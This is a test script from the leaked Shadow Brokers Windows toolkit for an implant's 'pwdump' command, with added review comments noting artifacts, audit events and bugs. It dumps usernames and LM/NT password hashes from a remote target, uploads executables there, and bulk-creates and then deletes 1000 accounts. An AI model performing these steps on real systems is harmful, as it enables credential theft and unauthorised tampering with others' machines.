shadowbrokers-exploits/windows/Resources/Ep/Scripts/Pwdump.eps
2017-04-14 11:45:07 +02:00


# Test script for the pwdump command. It checks argument handling, validates
# the fields pwdump returns, and - only when the implant is on a remote
# target - adds $TestUsers throwaway accounts to confirm that the reported
# user count grows by exactly that number, then deletes them again.
# The script's result is $rtn: true when every check passed.
# NOTE(review): pwdump output carries LanmanHash and NtHash values per account
# (see TestScriptVariables), so anything recorded from this run holds
# credential material and should be handled accordingly.
@echo off;
# TestSuccess / TestFailure are not defined in this file; presumably they come
# from TestIncludes.epm - confirm.
@include "TestIncludes.epm";
bool $rtn = true;
if ("YES" == GetEnv("Target_Win9x")) {
# This command isn't available in 9x environment
# Reported as a pass (true), not as a skip.
return true;
}
echo "---------------------------------------------------------------------------";
echo "PWDUMP Testing";
echo "---------------------------------------------------------------------------";
# Argument handling: the help form and the bare command are expected to
# succeed; an unknown switch and a stray positional argument are expected to
# be rejected.
TestSuccess("pwdump ?", true, $rtn);
TestSuccess("pwdump", true, $rtn);
TestFailure("pwdump -foo", true, $rtn);
TestFailure("pwdump foo", true, $rtn);
# Number of temporary accounts to create, and the name prefix they share.
# NOTE(review): the prefix is spelled "XxTextUser" here, while the failure
# message in CreateTestUsers prints "xxtestuser" - one of the two is a typo.
int $TestUsers = 1000;
string $BaseUid = "XxTextUser";
# User counts reported by pwdump before and after the accounts are added.
int $UserCntBase= 0;
int $UserCntTot = 0;
echo "\n";
echo "---------------------------------------------------------------------------";
echo "PWDUMP - Basic test with existing users";
echo "---------------------------------------------------------------------------";
ifnot(TestScriptVariables($UserCntBase)) /* Basic user test */
{
$rtn = false;
}
else
{
# presumably @record on/off brackets the command whose output GetCmdData
# reads afterwards - confirm against the interpreter documentation.
@record on;
if (`getnetaddr`)
{
@record off;
string $localAddr = GetCmdData("local_address");
string $remoteAddr = GetCmdData("remote_address");
# Equal addresses are treated as "running locally"; the bulk account test
# is then skipped so the operator's own machine is not modified.
ifnot($localAddr == $remoteAddr)
{
#
# Implant running on remote target okay to add extra users
#
# NOTE(review): for defenders this phase is noisy on the target. It uploads
# createusers.exe and addusers.exe, leaves a users.txt file, and creates then
# deletes $TestUsers accounts sharing the $BaseUid prefix. With
# account-management auditing enabled, Windows records those as Security
# events 4720/4726 (624/630 on pre-Vista NT-family systems).
echo "\n";
echo "---------------------------------------------------------------------------";
echo "PWDUMP adding $TestUsers test users to remote target($remoteAddr).";
echo "PWDUMP This will take a few minutes to complete.";
echo "---------------------------------------------------------------------------";
# NOTE(review): when CreateTestUsers fails, DeleteTestUsers is never called
# from this branch, so any accounts or files already created by a partial
# run are left on the target.
ifnot(CreateTestUsers($BaseUid, $TestUsers))
{
$rtn = false;
echo " FAILED - CreateTestUsers failed to add users to target($remoteAddr)";
pause;
}
else
{
echo "---------------------------------------------------------------------------";
echo "PWDUMP - Testing remote target($remoteAddr) after adding $TestUsers users";
echo "---------------------------------------------------------------------------";
ifnot(TestScriptVariables($UserCntTot))
{
$rtn = false;
}
else
{
# The count after the run must equal the baseline plus the accounts added.
int $Expectedusers = $UserCntBase;
$Expectedusers += $TestUsers;
# NOTE(review): the comparison is "not equal", so the message below is also
# printed when pwdump reports MORE users than expected, although it says
# "less than". The message also misspells "expected".
if ($UserCntTot != $Expectedusers)
{
$rtn = false;
echo " FAILED - Number of users($UserCntTot) less than extected($Expectedusers).";
pause;
}
}
# Cleanup runs whether or not the count check passed.
echo "\n";
echo "---------------------------------------------------------------------------";
echo "PWDUMP removing $TestUsers test users from remote target($remoteAddr)";
echo "PWDUMP This will take a few minutes to complete.";
echo "---------------------------------------------------------------------------";
ifnot(DeleteTestUsers())
{
$rtn = false;
echo " FAILED - DeleteTestUsers failed to delete the testusers from target box";
pause;
}
}
}
else
{
echo "\n";
echo "---------------------------------------------------------------------------";
echo "PWDUMP - CreateTestUsers not run because we are local";
echo "---------------------------------------------------------------------------";
}
}
else
{
# getnetaddr failed: recording is switched off and the bulk test is skipped
# silently. $rtn is not changed, so this path still counts as a pass.
@record off;
}
}
return $rtn;
#--------------------------------------------------------------------------
# TestScriptVariables
# Runs pwdump and checks the script variables it publishes (Username, rid,
# LanmanHash, NtHash): each must be defined and all four must have the
# same element count.
#
# Params:
# OUT int $userCnt
# Users processed by pwdump; left at 0 on any failure
#
# Returns:
# true if every check passed, false otherwise. The user count is
# handed back through $userCnt, not through the return value.
#
# NOTE(review): LanmanHash and NtHash are password hashes. This routine
# only checks that they are present and counts them, but they remain
# in script variables and in whatever the recording captured.
#--------------------------------------------------------------------------
sub TestScriptVariables (OUT int $userCnt)
{
bool $subrtn = true;
$userCnt = 0;
echo "PWDUMP Testing SCRIPT VARIABLES";
@record on;
ifnot (`pwdump`)
{
@record off;
$subrtn = false;
echo " FAILED - pwdump failed";
pause;
}
else
{
@record off;
# presumably each GetCmdData call yields one entry per account (sizeof is
# applied to all four below, including the int-typed $rid) - confirm.
string $Username = GetCmdData("Username");
int $rid = GetCmdData("rid");
string $LanmanHash = GetCmdData("LanmanHash");
string $NtHash = GetCmdData("NtHash");
# Every missing field is reported separately before giving up, so a single
# run lists all absent fields at once.
ifnot (defined($Username))
{
echo " FAILED - Username not defined";
$subrtn = false;
pause;
}
ifnot (defined($rid))
{
echo " FAILED - rid not defined";
$subrtn = false;
pause;
}
ifnot (defined($LanmanHash))
{
echo " FAILED - LanmanHash not defined";
$subrtn = false;
pause;
}
ifnot(defined($NtHash))
{
echo " FAILED - NtHash not defined";
$subrtn = false;
pause;
}
# Stop here if any field was missing; $userCnt is still 0.
ifnot($subrtn)
{
return $subrtn;
}
# All four fields must have the same number of entries; that number is the
# user count reported to the caller.
if ((sizeof($Username) == sizeof($rid)) &&
(sizeof($Username) == sizeof($LanmanHash)) &&
(sizeof($Username) == sizeof($NtHash)) )
{
$userCnt = sizeof($Username);
echo " PASSED - $userCnt user test";
}
else
{
# NOTE(review): this branch is reached when the fields are defined but their
# sizes differ, so "not defined" in the message below is misleading.
echo " FAILED - Script variables are not defined.";
$subrtn = false;
pause;
}
}
return $subrtn;
}
#--------------------------------------------------------------------------
# CreateTestUsers
# Adds new users to the target box. Uploads createusers.exe and
# addusers.exe if they are not already present, then runs both.
#
# Params:
# IN string $BaseUid
# Base userid used for creating the accounts
#
# IN int $users
# Number of users to add to target box
#
# Returns:
# $subrtn, which starts as true. It can only become false through the
# third argument of TestSuccess; presumably TestSuccess clears it on
# failure - confirm in TestIncludes.epm. Otherwise the early returns
# below would report success after a failed step.
#
# NOTE(review): artifacts this routine places on the target:
# createusers.exe, addusers.exe, the users.txt file passed to addusers.exe,
# the output redirected to createusers and addusers, and $users new
# accounts.
#--------------------------------------------------------------------------
sub CreateTestUsers (IN string $BaseUid, IN int $users)
{
bool $subrtn = true;
# see if createusers.exe is already there - temporarily
#------------------------------------------------------
ifnot (`checkfile -name createusers.exe`)
{
ifnot (TestSuccess("put createusers.exe -name createusers.exe", true, $subrtn))
{
echo "Unable to uploaded file createusers.exe";
pause;
return $subrtn;
}
}
# see if addusers.exe is already there - temporarily
#---------------------------------------------------
ifnot (`checkfile -name addusers.exe`)
{
ifnot (TestSuccess("put addusers.exe -name addusers.exe", true, $subrtn))
{
echo "Unable to uploaded file addusers.exe";
pause;
return $subrtn;
}
}
# presumably createusers.exe writes the users.txt list consumed by the next
# step; nothing else in this file creates that file - confirm.
ifnot (TestSuccess("run -command \"createusers.exe $BaseUid $users\" -redirect createusers", true, $subrtn))
{
# NOTE(review): the message hard-codes "xxtestuser" instead of printing
# $BaseUid, so it can disagree with the command that was actually run.
echo "Unable to run -command createusers.exe xxtestuser $users";
pause;
return $subrtn;
}
# Create the accounts listed in users.txt.
ifnot (TestSuccess("run -command \"addusers.exe /c users.txt /p:e\" -redirect addusers", true, $subrtn))
{
echo "Unable to run -command addusers.exe /c users.txt /p:e";
pause;
return $subrtn;
}
return $subrtn;
}
#--------------------------------------------------------------------------
# DeleteTestUsers
# Deletes the new users from the target box, using users.txt as the
# list of accounts to remove, then deletes users.txt.
#
# Params:
# (none)
#
# Returns:
# false when users.txt is missing. Otherwise $subrtn, which is only
# false if TestSuccess cleared it through its third argument
# (presumably on failure - confirm in TestIncludes.epm).
#
# NOTE(review): nothing in this file removes createusers.exe,
# addusers.exe or the redirected command output, so those remain on
# the target after the test.
#--------------------------------------------------------------------------
sub DeleteTestUsers ()
{
bool $subrtn = true;
# if users.txt exists then try to remove the users contained within
#------------------------------------------------------------------
if (`checkfile -name users.txt`)
{
ifnot (TestSuccess("run -command \"addusers.exe /e users.txt\" -redirect DeleteTestUsers", true, $subrtn))
{
echo "Unable to run -command addusers.exe /e users.txt";
pause;
}
# NOTE(review): users.txt is deleted even when the removal above failed.
# The only list of the created accounts is then gone while the accounts
# themselves may still exist on the target. The result of the del command
# is not checked.
`del users.txt`;
}
else
{
echo "Unable to find users.txt";
pause;
$subrtn = false;
}
return $subrtn;
}